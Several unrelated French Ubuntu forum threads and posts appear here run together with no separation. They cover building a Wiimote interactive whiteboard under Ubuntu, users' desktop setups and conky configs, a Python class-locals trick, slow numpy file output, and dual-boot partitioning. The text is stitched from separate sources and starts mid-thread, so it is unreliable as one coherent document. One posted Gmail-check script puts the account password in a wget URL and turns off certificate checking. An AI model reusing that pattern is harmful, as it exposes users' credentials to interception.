vivement autre chose !!! ) - Asus X5DAF - ATI 512Mo - Ubuntu 12.04 AMD-64 Hors ligne Jer!cho Re : TBI + wiimote + ubuntu Rien à faire, ça veut pas : ni le cadre de texte ni le clavier virtuel ne fonctionne. Déco de la session immédiate. La version de python est celle qui était installée avant 'gtkwhiteboard' cad la 2.8 : j'avais édité le fichier de conf comme le tuto le recommandait afin de correspondre à la version déjà installée. As-tu la même ? PS : j'ai résolu le problème du message d'erreur de l'icone au lancement de 'gtkwhiteboard' : solution 1 -> enlever les lignes et donc l'icone dans l'application : - editer le script : 'sudo gedit /usr/share/gtkwhiteboard/gtkwhiteboard.py' - commenter les trois lignes concernant l'icone (faites une recherche de "ico" dans gedit) Solution 2 -> lui donner ce qu'il veut : - on ouvre /usr/share/pixmaps/gtkwhiteboard.xpm avec gimp - on l'enregistre en format .ico dans notre home Solution 3 -> mettre l'icone au bon endroit pour faire plus propre : - on ouvre /usr/share/pixmaps/gtkwhiteboard.xpm avec gimp - on l'enregistre en format .ico dans /usr/share/pixmaps/ - on édite avec 'sudo gedit /usr/share/gtkwhiteboard/gtkwhiteboard.py' ' et on lui donne le chemin complet de l'icone en mettant : iconFile = "/usr/share/pixmaps/gtkwhiteboard.ico" et voilà... Dernière modification par Jer!cho (Le 04/02/2009, à 15:40) Hors ligne mao-40 Re : TBI + wiimote + ubuntu Petite précision, le clavier virtuel de Interwrite ne s'affiche pas. J'utilise celui de Cellwriter. Dernière modification par mao-40 (Le 09/02/2009, à 22:11) - * HP Quad Core Q9300 2,5GHz - 6Go - Nvidia GeForce GT 610 1Go - Ubuntu 13.10 64 (Gnome-Shell, vivement autre chose !!! ) - Asus X5DAF - ATI 512Mo - Ubuntu 12.04 AMD-64 Hors ligne mao-40 Re : TBI + wiimote + ubuntu Bonjour, Petit retour d'expérience du script python en utilisation avec vidéo projecteur : Reconnaissance, calibration sensibilité : super !!!Précision : catastrophique, impossible d'écrire quoi que ce soit, les courbes sont complètement morcelées. Il faudrait lier la sensibilité du script python "GTK Wiimote Whiteboard" avec la précision du deb "Wiimote Whiteboard". Mais je crois que c'est pas pour demain. :(:( Dernière modification par mao-40 (Le 09/02/2009, à 22:16) - * HP Quad Core Q9300 2,5GHz - 6Go - Nvidia GeForce GT 610 1Go - Ubuntu 13.10 64 (Gnome-Shell, vivement autre chose !!! ) - Asus X5DAF - ATI 512Mo - Ubuntu 12.04 AMD-64 Hors ligne alain14773 Re : TBI + wiimote + ubuntu Bonjour, Un petit retour d'expérience également Je viens également de faire plusieurs essais avec GTK Wiimote Whiteboard Sur mon ordinateur fixe personnel acer avec processeur quadricoeur Q6600 à 2,40 Ghz, 95 Goctets disponibles sur la partition linux, affichage réglé d'abord avec l'écran 17 pouces en résolution 1024 768 puis écran débranché et remplacé par video projecteur epson , batterie wiimote à 45 % Là : Impeccable Précision, rapidité, fluidité avec gpaint, tuxpaint,firefox (calques déplaçables) et interwrite la réaction au stylet (stylet maison avec diode LTE 5208 (CRY 89 a) de selectronic) est instantannée le trait ou l'écriture se fait simultanément sans aucun retard aussi bien que si on tenait une craie Remarque Ce pc est en dual boot et j'ai eu du utiliser bluesoleil (payant) sous vista pour faire reconnaitre ma clef bluetooth marque blue snork à 11 euros alors que alors que sous linux rien eu à faire .... Par contre avec mon ordinateur professionnel portable lenovo 3000 N200 992 MO de mémoire processeur dual à 1,6 Ghz blue tooth intégré Installation d'ubuntu 8,10 faite directement à partir de windows Xp sur un espace réduit 10 Giga octets Pas de problème pour installer GTK Wiimote Whiteboard grâce à la procédure donnée au début de cette discussion Stylet qui fonctionne sur l'écran du pc Il laisse une trace sous gpaint mais ce n'est pas très fluide Par contre... Pas moyen d'installer interwrite pour cause d'espace dans un répertoire temp insuffisant voir message The directory /home/ubuntu/istemp11833044110728 does not contain enough space to extract temporary files. Please specify a temporary directory using the -is:tempdir option. Use the -is:help option for more information. Y a t'il une solution pour passer cet obstacle ? (c'est pour pouvoir montrer l'utilisation d'interwrite sur le portable ...) Echec aussi avec le vidéoprojecteur : le pointeur est bien détecté mais sous gpaint aucune trace ne s'inscrit sur le mur (sauf de temps en temps un point ou deux) De même les calques ne sont pas déplacés sous firefox De plus, la configuration du vidéoprojecteur ne s'est pas faite facilement( avantage XP !) Je pense donc que les capacités de la machine sont un paramètre très important même si les ressources demandées pour gérer le blue tooth et la wiimote ne paraissent pas énormes... Cordialement Alain Eatice Paimpol Hors ligne frucot Re : TBI + wiimote + ubuntu Rajouter l'option -is:tempdir avec un chemin vers un répertoire ayant suffisamment de place. D'une manière générale il me semble que l'installation de Ubuntu dans windows n'est pas la meilleure solution, (moins rapide, et moins sûr). Pour ce qui du videoprojecteur, j'ai remarqué qu'il fallait utiliser une résolution de 1024x768 et en clonant les écrans cela allait bien. (Système->Préférences->Résolution d'écran) Il faut peut-être aussi désactiver les effets compiz (Systéme->Préférences->Apparence Onglet Effets visuels Aucun). Hors ligne frucot Re : TBI + wiimote + ubuntu Pour moi sous ubuntu 8.10 module bluetooth Broadcomm BCM2210. Installation de GTKwhiteboard en suivant la modif citée plus haut. Pas de problèmes, détection de la wiimote et du stylo IR parfaite (LED IR SFH484-2) Installation de Interwriter LE linux en suivant leur notice : il y a une erreur (ne pas faire sudo su mais uniquement sudo). A part cela il fonctionne correctement. Le clavier virtuel est en anglais mais un petit tour dans les préférences règle cela (option sélectionner une langue -> Français) PS : Si cela intéresse quelqu'un, je peux envoyer le paquet gtkwhiteboard modifié pour Ubuntu 8.10. Hors ligne Kokoyaya Re : TBI + wiimote + ubuntu Je pense que ça peut intéresser du monde (moi en particulier ). Tu pourrais le joindre au forum ou mettre un petit lien stp ? Hors ligne frucot Re : TBI + wiimote + ubuntu Voici le lien pour télécharger le fichier : http://pourlecole.net/ariane/download/g … -5_all.deb Il fonctionne avec Ubuntu 8.10 en utilisant GDebi pour l'installer Dernière modification par frucot (Le 22/02/2009, à 21:21) Hors ligne Bionet Re : TBI + wiimote + ubuntu Bonjour, j'ai un problème que j'attribuerai volontier à intrepid s'il n'y avait pas les témoignages de collègues qui n'ont pas ce soucis. J'ai un "Échec de l'appariement avec Nintendo RVL-CNT-01" lorsque j'essaie de Définir un nouveau périphérique BlueTooth. avec lswm j'obtiens bien l'adresse MAC de ma Wiimote : 00:17:AB:39:56:C9 Mais avec wmgui ou wminput j'ai un "Socket Connect Error (control channel), unable to connect". alors forcément, que ce soit avec Whiteboard ou GTK Whiteboard je n'arrive pas à connecter ma Wiimote. (ou plutôt je n'arrive pas à l'" apparier" ce qui doit être, à priori, le mot à employer). Le problème c'est qu'avec le même Dongle BlueTooth j'arrivais à connecter ma Wiimote sous Hardy. j'ai suivi les consignes sur la page Wiimote de la doc (ajout des références à l'adresse MAC dans le fichier .bashrc). Alors, si quelqu'un à une petite idée sur la marche à suivre pour que j'arrive à faire fonctionne mon futur TNWii je suis preneur. NOTE : je suis sous Intrebid (8.10, version CrunchEee), sur un EeePC 701. J'ai utilisé le .deb de gtkwhiteboard donné par frucot (ça a installé 7 paquets supplémentaires). Dernière modification par Bionet (Le 25/02/2009, à 12:59) Hors ligne sakurazuka38 Re : TBI + wiimote + ubuntu Bonjour a tous, Après une petite pause, je repars dans mon projet tnwii. A votre avis est-il envisageable d'installer la version windows d'interwrite et l'utiliser avec wine? Hors ligne frucot Re : TBI + wiimote + ubuntu Pour utiliser Interwriter avec wine, je ne sais pas, mais pour moi (ubuntu 8.10) il fonctionne bien. je le trouve même plus "joli" que sous windows!. Tu peux essayer le paquet que j'ai mis en lien précédemment http://pourlecole.net/ariane/download/g … -5_all.deb A+ Hors ligne sakurazuka38 Re : TBI + wiimote + ubuntu Ok je vais tenter interwrite directement sous ubuntu mais j'avoue que je n'ai pas trop compris comment l'installer...ca avait merdé lors de l'installation du coup j'ai abandonné! Hors ligne Tbones1977 Re : TBI + wiimote + ubuntu Bonsoir, J'utilise aussi le TNWii en classe depuis la rentrée. C'est assez simple. Pour fabriquer son stylet (et plein d'autres infos utiles): http://www.prtice.info/?voir=tnwii_fabrication_stylet Utilisation sous linux: Se connecter et utiliser la wiimote avec le stylet => wiimote whiteboard: http://code.google.com/p/linux-whiteboard/downloads/list Tester sa connexion et les fonctionnalités de la wiimote =>wmgui (dans les dépots toutes applications disponibles) Dessiner sur l'image projetée (ou sur l'ecran) => gromit: http://www.home.unix-ag.org/simon/gromit/ Ou plus aboutit, => pointofix (a installer avec Wine): http://www.pointofix.de/download.php Personnellement j'ai constaté qq problèmes avec le soft wiimote whiteboard (avec gromit ou pointofix le tracé d'une ligne pleine sur l'écran est rendu de manière discontinue) Comme j'ai des logiciels sous win que j'utilise avec les élèves, j'ai transféré la gestion de mon module bluetooth usb a ma virtualbox XP et cela fonctionne mieux. Du coup j'utilise le logiciel libre qui existe sous win wiimotesmoothboard http://www.boonjin.com/wp/2008/08/14/wiimote-smoothboard-045-beta bon tnwii! Peux-tu me dire svp comment tu es parvenu à faire reconnaitre ton récepteur bluetooth usb en virtual box. J'arrive pas à le voir moi. Merci sakurazuka38 Re : TBI + wiimote + ubuntu Bon ben j'ai essayé d'installer interwrite...tout s'est bien passé, l'installateur s'est lancé mais très rapidement j'ai eu droit à un message d'erreur: "could not create directory /opt/interwrite_workspace" ou un truc comme ca! Si quelqu'un sait comment résoudre ce probleme! Hors ligne untamed-duck Re : TBI + wiimote + ubuntu @Tbones Arrives tu a te connecter sur d'autres périphériques usb avec ta virtual box? Si les périphériques usb ne fonctionnent pas va voir sur la doc Virtual box Ubuntu. http://doc.ubuntu-fr.org/virtualbox Il y a une petite manip a faire. Hors ligne e2q2 Re : TBI + wiimote + ubuntu Bonjour, j'ai un videoproj, une wiimote mais le stylet Del-IR que j'ai fabriqué n'est pas assez précis... Quelqu'un pourrait-il m'en fabriquer une (contre finances) ou m'indiquer où en trouver un qui soit bien adapté pour une utilisation avec la wiimote ? Merci d'avance. Hors ligne Jer!cho Re : TBI + wiimote + ubuntu C'est en anglais mais je pense que tu trouveras ton bonheur -> ici <- et plus particulièrement là : "Market Place -> For Sale -> IR Pens". Dernière modification par Jer!cho (Le 23/03/2009, à 21:10) Hors ligne frucot Re : TBI + wiimote + ubuntu Voici ce que je viens de trouver : http://www.ryxeo.com/materiels_6_pack-open-tni__tnwii_pack1.html Pour connaitre et utiliser la distribution AbulEdu dont Ryxeo est le maitre d'oeuvre, c'est du sérieux. Hors ligne sarto21 Re : TBI + wiimote + ubuntu Bonjour à tous, Simplement une petite remarque. La précision du TBWiiii dépend du calibrage mais est aussi fonction du vidéoprojecteur utilisé. J'ai remarqué (sous Windows, mais sous Linux ça doit être pareil) que certains vidéos sont "impropores" à l'utilisation TBWiii (bonne précision en haut et en bas de l'image, gros décalage au centre). Hors ligne frucot Re : TBI + wiimote + ubuntu Alors, j'ai de la chance avec mon petit videoproj à matrice DLP Hors ligne ilym Re : TBI + wiimote + ubuntu problème : à l'installation du logiciel aucun pb, mais après et maintenant j'ai ce message d'erreur : Traceback (most recent call last): File "/usr/share/gtkwhiteboard/gtkwhiteboard.py", line 527, in <module> frame = MainWindow(None,"Wiimote Whiteboard Controller") File "/usr/share/gtkwhiteboard/gtkwhiteboard.py", line 260, in __init__ if not self.LoadOptions(): File "/usr/share/gtkwhiteboard/gtkwhiteboard.py", line 305, in LoadOptions self.w.perspective.setsrc(*d['CalibrationDots']) File "/usr/share/gtkwhiteboard/perspective.py", line 54, in setsrc self.computeWarpMatrix() File "/usr/share/gtkwhiteboard/perspective.py", line 61, in computeWarpMatrix self.srcmatrix = self.computeQuadToSquare(self.srcdots) File "/usr/share/gtkwhiteboard/perspective.py", line 110, in computeQuadToSquare mat = self.computeSquareToQuad(inputdots) File "/usr/share/gtkwhiteboard/perspective.py", line 76, in computeSquareToQuad g = (sx * dy2 - dx2 * sy) / (dx1 * dy2 - dx2 * dy1) ZeroDivisionError: float division pourquoi? comment résoudre ça ? je pense que c'est les fichiers de configurations qui ont du avoir un pb. J'aimerai donc savoir où sont'ils pour pouvoir les supprimer ? (sachant que j'ai déjà fait une réinstallation complète et que ça marche pas) merci de votre aide Hors ligne ilym Re : TBI + wiimote + ubuntu non personne ? Hors ligne
Leo 7 Re : A quoi ressemble votre environnement - printemps/été 2012 J'adore ton unity Mario_26 Est-ce que tu peux me donner le lien du wall STP, je le touve très zoli. Merci d'avance A+ hp 625: Ubuntu LTS xfce / Mac Mini ppc G4: Debian stable xfce / Les choses les plus simples sont les meilleures ! Hors ligne Major Grubert Re : A quoi ressemble votre environnement - printemps/été 2012 Très élégant, tu as les sources ? Hors ligne cherrak Re : A quoi ressemble votre environnement - printemps/été 2012 J'adore ton unity Mario_26 smile Est-ce que tu peux me donner le lien du wall STP, je le touve très zoli. Merci d'avance A+ Quand a moi j'aimerai bien ton conky stp (ma copine l'adore) Tres beau bureau en tous cas titou345 Re : A quoi ressemble votre environnement - printemps/été 2012 J'adore ton unity Mario_26 Est-ce que tu peux me donner le lien du wall STP, je le touve très zoli. Merci d'avance A+ C'est un des (beaux) fonds d'écran par défaut de Ubuntu 12.04 que tu peux retrouver ici : Machin a dit truc-bidule. Bref, moi je suis cultivé quoi. Hors ligne titou345 Re : A quoi ressemble votre environnement - printemps/été 2012 Comment tu appliques les thèmes d'icônes sur Precise ? Machin a dit truc-bidule. Bref, moi je suis cultivé quoi. Hors ligne Laurent_chébran Re : A quoi ressemble votre environnement - printemps/été 2012 Comment tu appliques les thèmes d'icônes sur Precise ? Tu vas planter ton ficher dans usr/share/icons en démarrant nautilus en root et ensuite tu changes le thème en passant par gnome-tweak-tool.. Hors ligne Leo 7 Re : A quoi ressemble votre environnement - printemps/été 2012 @titou345: Merci hp 625: Ubuntu LTS xfce / Mac Mini ppc G4: Debian stable xfce / Les choses les plus simples sont les meilleures ! Hors ligne titou345 Re : A quoi ressemble votre environnement - printemps/été 2012 titou345 a écrit : Comment tu appliques les thèmes d'icônes sur Precise ? Tu vas planter ton ficher dans usr/share/icons en démarrant nautilus en root et ensuite tu changes le thème en passant par gnome-tweak-tool.. Merci à toi. J'avais un doute sur la compatibilité de Gnome-tweak-tool avec la dernière version de Unity. Machin a dit truc-bidule. Bref, moi je suis cultivé quoi. Hors ligne hells_dark Re : A quoi ressemble votre environnement - printemps/été 2012 Très élégant, tu as les sources ? conky #!/usr/bin/conky -d -c ## .conkyrc configuration alignment top_right background yes cpu_avg_samples 2 default_color fff # szary 5f5f5f default_outline_color 000000 # Black default_shade_color 000000 # Black double_buffer yes draw_borders no draw_graph_borders no draw_outline no draw_shades no gap_x 0 gap_y 450 max_specials 1024 max_user_text 10000 maximum_width 150 minimum_size 150 net_avg_samples 2 no_buffers yes override_utf8_locale yes own_window yes own_window_colour 000000 # Black own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager own_window_transparent yes #own_window_type normal pad_percents 2 short_units yes stippled_borders 3 text_buffer_size 8000 total_run_times 0 update_interval 1.0 uppercase no use_spacer right use_xft yes xftalpha 1 xftfont Freesans:pixelsize=9 TEXT ${font helvetica:pixelsize=11} ${offset 50}Galaxy S3 ${offset 50}${texeci 180 ~/.conky/scripts/rebours.sh 05/03/2012} ${offset 50}Ubuntu 12.04 ${offset 50}${texeci 180 ~/.conky/scripts/rebours.sh 04/26/2012} ${offset 50}Mails ${offset 50}${texeci 180 python ~/.conky/scripts/check_gmail_cpt.py} message(s) ${image ~/.conky/images/android.png -p 20,25} ${image ~/.conky/images/ubuntu.png -p 20,72} ${image ~/.conky/images/mail.gif -p 20,118} compte à rebours #!/bin/bash # Conky CountDown - Script de compte à rebours upd=$(date +%s -d $1) acts=$(date +%m/%d/%Y) act=$(date +%s -d $acts) diff=$(($upd-$act)) jours=$(($diff/3600/24)) if [ $jours -le 0 ] then echo "Date atteinte !" else echo "$jours jours" fi exit 0 gmail import os import string #Enter your username and password below within double quotes # eg. username="username" and password="password" username="username" password="password" com="wget -O - https://"+username+":"+password+"@mail.google.com/mail/feed/atom --no-check-certificate" temp=os.popen(com) msg=temp.read() index=string.find(msg,"<fullcount>") index2=string.find(msg,"</fullcount>") fc=int(msg[index+11:index2]) print fc Hors ligne Major Grubert Re : A quoi ressemble votre environnement - printemps/été 2012 merci, je regarde ça demain Hors ligne Theo46300 Re : A quoi ressemble votre environnement - printemps/été 2012 Tous bureau sont très jolis ici Très beau bureau hells_dark tu pourrai donné le lien du wallpaper stp. Dernière modification par Theo46300 (Le 04/05/2012, à 07:07) Ubuntu 12.04 (32 bit)-gnome-shell Packard-bell easynote mx51 Une fois que l'on a découvert Linux on ne peut plus s'en passer. Hors ligne The Uploader Re : A quoi ressemble votre environnement - printemps/été 2012 Après le Xfce "à la Unity", voici le Xfce "à la Gnome Shell" : http://forum.xfce.org/viewtopic.php?id=6928 La classe! Dernière modification par The Uploader (Le 04/05/2012, à 11:17) Passer de Ubuntu 10.04 à Xubuntu 12.04 LTS Archlinux + KDE sur ASUS N56VV. ALSA, SysV, DBus, Xorg = Windows 98 ! systemd, kdbus, ALSA + PulseAudio, Wayland = modern OS (10 years after Windows, but still...) ! Deal with it ! Hors ligne Major Grubert Re : A quoi ressemble votre environnement - printemps/été 2012 GS c'est avant tout un mode exposition, pas tellement une apparence. Enfin je trouve. Hors ligne Mario_26 Re : A quoi ressemble votre environnement - printemps/été 2012 Salut ! @ Leo 7 : Effectivement c'est un des Wall qui se trouve dans Ubuntu 12.04... @ cherrak : Le Conky se trouve sur Gnome Look ici, à toi de l'adapter à ta sauce Je vois énormement de Arch, bien que nous somme sur le forum de Ubuntu... Je vous montre donc la mienne Très simple mais aussi très efficace !! ++ Hors ligne cherrak Re : A quoi ressemble votre environnement - printemps/été 2012 Ok merci ! Tres joli bureau Major Grubert Re : A quoi ressemble votre environnement - printemps/été 2012 Petit succès pour toi hells Pour moi, top bureau : . Gnome shell : une preuve du bon goût . Un conky discret et élégant . Un fond d'écran distingué On partage les mêmes valeurs Hors ligne Heliox Re : A quoi ressemble votre environnement - printemps/été 2012 [HS] Pour ceux que ça intéresse, sur Fedora il est possible d'avoir les thèmes Ambiance et Radiance (ceux inclus par défaut avec Ubuntu) dans Gnome 3 : # yum install light-theme-gnome Reste Gnome-Shell qui n'est pas en accord avec ces thèmes… [/HS] Dernière modification par Heliox (Le 05/05/2012, à 12:33) titou345 Re : A quoi ressemble votre environnement - printemps/été 2012 Très épuré, très classe, bravo. Tu utilises Gnome Shell avec Ubuntu ? Quel est ton thème ? Merci. Dernière modification par titou345 (Le 06/05/2012, à 00:23) Machin a dit truc-bidule. Bref, moi je suis cultivé quoi. Hors ligne Leo 7 Re : A quoi ressemble votre environnement - printemps/été 2012 hp 625: Ubuntu LTS xfce / Mac Mini ppc G4: Debian stable xfce / Les choses les plus simples sont les meilleures ! Hors ligne pololasi Re : A quoi ressemble votre environnement - printemps/été 2012 Voici le mien du moment, sous crunchbang : Toujours aussi classe et précis tes environnements. Thinkpad X 200 ; Intel Core2 Duo CPU P8600 ; 2 Go de DDR3 ; Intel 4500MHD Xubuntu 14.04.1 LTS 64 bits Athlon XP 3000+ ; Asus A7V400MX ; ATI Radeon X1600 ; 2 giga de ram Xubuntu 12.04.3 LTS 32 bits Hors ligne
Anyways, the idea is the following: you want to change the class attributes before it becomes final -- there are things you just can't do in Python after a class is already declared (Python uses this technique for creating properties -- in my specific use-case I'm using it to overcome some limitations that Django has in its model inheritance with fields, but I've already used this many times). The idea is the following: you get the frame which is being used inside the class declaration and change the locals in it so that the final created class will have the things you declared. I.e.: This code: import sys def prototype_class(frame=None): if frame is None: frame = sys._getframe().f_back frame.f_locals['new_attribute'] = 'New attribute' class MyNewClass(object): prototype_class() print MyNewClass().new_attribute Is the same as: class MyNewClass(object): new_attribute = 'New attribute' -- Just more complicated and more flexible -- in my case, it'll properly help me to choose how to create and customize the fields of a Django model class without having to copy and paste a bunch of code. On a separate note, blogspot just sucks for code... why can't they simply create an option to add a piece of code? I'm now manually putting my code in html as described in http://stackoverflow.com/a/8697421/110451 -- it'd certainly be trivial for the blogspot devs to put a button which would do that for me right? (colors would be nicer, but this is the easiest things that just works for me and I'd already settle for it if blogger added it -- I know blogger has the quotes, but I want the code at least on a box with a monospaced font).
I want to write some random numbers into an ascii output file.I generate the numbers with numpy, so the numbers are stored in numpy.array import numpy as np random1=np.random.uniform(-1.2,1.2,7e6) random2=... random3=... All three array are of the same size. I used standard file output, but this is really slow. Just about 8000 lines per 30 min. This may because I loop over three large arrays though. fout1 = open("output.dat","w") for i in range(len(random1)): fout1.write(str(random1[i])+"\t"+ str(random2[i])+"\t"+ str(random3[i])+"\n") fout1.close() I also just used print str(random1[i])+"\t"+ str(random2[i])+"\t"+ str(random3[i]) and dumped everything in a file usind shell ./myprog.py > output.dat which seems a bit faster but still I am not satisfied with the output speed. Any recommendations are really welcome.
Raze [Résolu] Conseils partition Salut ! Je souhaite installer Ubuntu en dual-boot avec Windows 8.1, et malgré mes nombreuses lectures je me pose certaines questions, notamment au niveau du partitionnement du disque ! Je viens donc vous demander quelques conseils. En effet, à ce que j'ai compris, il est possible de créer une partition en NTFS commune aux deux OS, pour pouvoir avoir accès à tout mes fichiers depuis n'importe quel OS. Ça ne pose aucun problème particulier ? C'est même conseiller ? A quel moment faut il le faire, lors du partitionnement lorsqu'on installe linux ? Et selon vous, quelle taille devrai-je allouer à chaque partition ? Sachant que je veux utiliser la plupart du temps Ubuntu, mais que windows me sert pour quelques jeux, et quelques logiciels pour la musique en général. Et j'ai presque 100Go de musique, film, série, etc.. et ça va s'agrandir ! Bref, il me faut assez de place sur windows pour différents logiciels, assez sur Ubuntu pour la même chose, et beaucoup pour les fichiers en général ! (J'arrive pas trop à visualiser la place dont j'ai besoin en fait, et je pense qu'il vaut mieux trop que pas assez). Voila, merci d'avance ! Dernière modification par Raze (Le 03/04/2014, à 18:03) Hors ligne moko138 Re : [Résolu] Conseils partition 1) Sauvegarder ses données ! 2) Lire la doc et autres messages du forum : cohabitation_ubuntu_windows http://forum.ubuntu-fr.org/viewtopic.ph … #p10013961 http://forum.ubuntu-fr.org/viewtopic.ph … #p15186071 http://forum.ubuntu-fr.org/viewtopic.ph … #p15503211 3) Tester la compatibilité de son matériel avec une live usb de ubuntu. 4) Réduire C: depuis win8. 5) Créer - impérativement avant l'installation - trois partitions dans cet ordre : - ntfs, pour partage de données - ext4, pour la racine de ubuntu, taille : 25 Gio - linux-swap, pour la swap, taille : 1,05 fois la taille de sa ram. 6) Installer "en choisissant impérativement "autre chose" à l'étape 3" (merci malbo !) EDIT : 7) Appliquer à sa partition ntfs de données l'option de montage windows_names, cf. mount_fstab. Cette option est judicieuse même pour les disques externes en ntfs. Dernière modification par moko138 (Le 21/03/2014, à 21:30) Hors ligne Raze Re : [Résolu] Conseils partition Merci pour ta réponse ! J'avais déjà lu ces topics, mais je ne savais pas pour l'ordre ! Lorsque je crée en premier la partition NTFS pour le partage de données, je choisi bien "sur tout l'espace disponible" non ? Du coup ça ne pose pas de problème pour les deux autres partitions ? Et la question que je vais poser est peut être bête, mais concrètement pour les données sur la partition de partage, je peux les déplacer de ma sauvegarde (disque dur externe) directement dans cette partition sans souci ? Et encore une question, j'ai cru lire qu'on ne pouvait pas repartitionner vers la gauche, exact ? Du coup, si j'ai une partie de mes données sur C:, que je crée mes différentes partitions dont celle de partage, et que je déplace après mes données dans celle la et que je reduit la taille de C:, je ne vais pas avoir une partie non allouée que je ne peux pas exploiter ? Hors ligne moko138 Re : [Résolu] Conseils partition J'avais déjà lu ces topics, mais je ne savais pas pour l'ordre ! Lorsque je crée en premier la partition NTFS pour le partage de données, je choisi bien "sur tout l'espace disponible" non ? Ben NON ! tu la fais juste après C: à sa gauche, et tu gardes au bout à droite la place pour les deux partitions système. Il y aura une soustraction à faire. concrètement pour les données sur la partition de partage, je peux les déplacer de ma sauvegarde (disque dur externe) directement dans cette partition sans souci ? Je te conseille vigoureusement de les copier (et non déplacer, sinon, à quoi bon une sauvegarde ?) de ton support externe vers ta partition de partage. Mais seulement après l'installation ! Et encore une question, j'ai cru lire qu'on ne pouvait pas repartitionner vers la gauche, exact ? Du coup, si j'ai une partie de mes données sur C:, que je crée mes différentes partitions dont celle de partage, et que je déplace après mes données dans celle la et que je reduit la taille de C:, je ne vais pas avoir une partie non allouée que je ne peux pas exploiter ? Il me semble que tu as écrit une première phrase, relative à "l'ordre" des opérations... qui, justement, est incompatible avec ta question. Cf. "4) Réduire C: (...) 5) Créer (...)" Esquisse sur un papier le schéma définitif des partitions. tu auras le schéma actuel quand tu en seras au troisième point. Ce sont des opérations à faire à froid et calmement. Donc pose toutes les questions dont tu ne trouves pas seul les réponses. Continue à demander confirmation au moindre doute. Hors ligne Raze Re : [Résolu] Conseils partition Bon Ubuntu installé sans problème, et tourne nickel ! Merci Moko Juste un ou deux trucs (peut être créer un nouveau topic ailleurs ?). Lors du démarrage, j'ai : [ 13.211517] nouveau E[ VBIOS] [0000:01::00.0] unable to locate usable images [ 13.211558] nouveau E[ DEVICE] [0000:01:00.0] failed to create 0X10000001, -22 [13.211594] nouveau E[ DRM] failed to create 0X80000080, -22 Une idée de ce que ça peut être ? Hors ligne moko138 Re : [Résolu] Conseils partition Content que ça tourne ! Ne néglige pas les précautions de compatibilité entre O.S. : ce serait désolant de perdre des données... nouveau est un pilote libre pour les cartes graphiques nvidia.DRM = Direct Rendering Manager, outil de rendu graphique. Donc si ton affichage est correct, que le ventiulateur de ta carte ne se prend pas pour un réacteur, ça va ! Mais si des soucis d'ordre graphique se présentent, ouvre en effet un nouveau fil dans la section ad hoc. Hors ligne Raze Re : [Résolu] Conseils partition Oui, et franchement c'est génial, j'aurai du passer dessus il y a longtemps ! Pratiquement pas de bug, beau, beaucoup plus facile a installer avec les lignes de commande et/ou la logithèque, et surtout une bonne communauté avec des gens pour aider ! A quoi pense tu exactement quand tu dis de ne pas négliger les précautions de comptabilité ? Ok, merci pour l'info. Ça rejoint le fait que je n'ai pas de pilotes additionnels affichés et proposés dans l'interface de mise à jour. J'ai une carte Nvidia Optimus, donc apparemment c'est un peu galère, mais pas de souci d'affichage ni de ventilo pour l'instant ! Par contre niveau batterie, elle se décharge super vite par rapport à windows pour le coup.. Je sais pas s'il y a un lien, mais ça me semble plausible. Hors ligne GP974 Re : [Résolu] Conseils partition bonjour si tu est sous optimus installe bumblebee Ubunteros depuis 10.04 Restez libre avec Linux :) Fixe : i7 [email protected] | 8go(1866Mhz) |Gtx 570@nvidia-340 | Samsung 840evo(120Go) | Ubuntu 12.04.4 & 14.04 Portable(asus N75SF) : i5 [email protected] | 8go(1333Mhz) | IntelHD3000/GT555m@nvidia-340 | Vertex2(180go)| Arch & 12.04.4 & 14.10(dev) Développeur de nvidiux Hors ligne moko138 Re : [Résolu] Conseils partition A quoi pense tu exactement quand tu dis de ne pas négliger les précautions de comptabilité ? niveau batterie, elle se décharge super vite par rapport à windows pour le coup.. Je sais pas s'il y a un lien, mais ça me semble plausible. Pour la batterie, installe tlp : regarde le tuto de nam1962 là : http://forum.ubuntu-fr.org/viewtopic.php?id=1408621 et suis le conseil de GP974. Pas la compta, la compa-ti-bilité : Si tu as suivi et appliqué les liens que je t'ai indiqués au début, ça ira. Sinon, tu peux être sûr que windows va t'effacer des travaux créés ou modifiés sous linux sur une partition ntfs... Exemple tout frais là : http://forum.ubuntu-fr.org/viewtopic.ph … #p16355181 D'ailleurs, on va appliquer ensemble l'option de montage windows_names, cf. mount_fstab, que j'avais oubliée dans ma première réponse. Hors ligne Raze Re : [Résolu] Conseils partition Bumblebee installé, et effectivement niveau batterie ça va mieux. Par contre j'ai pas l'impression que tlp change quelque chose. La compta, n'importe quoi... J'avais fait un test des le début pour voir s'il n'y avait pas de problème pour les fichiers, et ça allé. Et j'ai pas eu de souci par rapport à ça depuis que je l'utilise. Ok, merci. Je vais voir ça. Hors ligne Babdu89 Re : [Résolu] Conseils partition Bonjour. Pour satisfaire ma curiosité. Stp, veux tu bien faire et poster un boot info script depuis ton Ubuntu installé? . Pour ce faire; Installer Boot-Repair; sudo add-apt-repository ppa:yannubuntu/boot-repair -y && sudo apt-get update; sudo apt-get install -y boot-repair Lancer Boot-Repair, et dans la fenêtre principale, cliquer sur le bouton " Créer un rapport boot info script ...." Puis poster ici l'URL donnée dans la dernière fenêtre de Boot-Repair. Merci Je me documente sur tout ce qui est installation en mode UEFI . Merci a malbo entre autre... @+. Babdu89 . J'ai découvert Ubuntu avec la 07.10.... Et alors?!... Depuis je regarde de temps en temps si Windows marche toujours.... Hors ligne Raze Re : [Résolu] Conseils partition Ouaip http://paste.ubuntu.com/7141613/ C'est normal qu'il me mette "EFI détecté. Veuillez vérifier les options" quand je le lance, pas de souci ? Hors ligne Babdu89 Re : [Résolu] Conseils partition Merci. Tes deux os démarrent bien?. @+. Babdu89 . J'ai découvert Ubuntu avec la 07.10.... Et alors?!... Depuis je regarde de temps en temps si Windows marche toujours.... Hors ligne Raze Re : [Résolu] Conseils partition Oui, mes deux os démarrent bien, un léger souci d'affichage quand je lance Windows (écran violet du grub avec un carré pour la roue de chargement) mais après pas de souci. Par contre pour le mount_fstab j'ai pas encore fait, un peu compliqué je vois pas trop ce que je dois faire concrètement Par contre j'ai un problème, je sais pas si je fais bien de le poster ici, je changerai si besoin.. Je n'ai plus accès aux "Paramètre Système" * , et j'ai deux logo wifi dont un avec un cadenas, je crois que c'est du à une mise à jour mais je sais pas comment revenir en arrière. (J'ai installé et desinstallé cheese, et rajouté les ppa de gstreamer. D'ailleurs je ne peux toujours pas lancer gstreamer properties (command not found)) Et un autre problème, j'ai lancé le réparateur de démarrage, mais maintenant dans le grub j'ai beaucoup plus de choix qu'auparavant.. Je vous remet le boot info, au cas ou http://paste.ubuntu.com/7152448/ Merci d'avance.. * EDIT : Lorsque je regarde toutes les applications 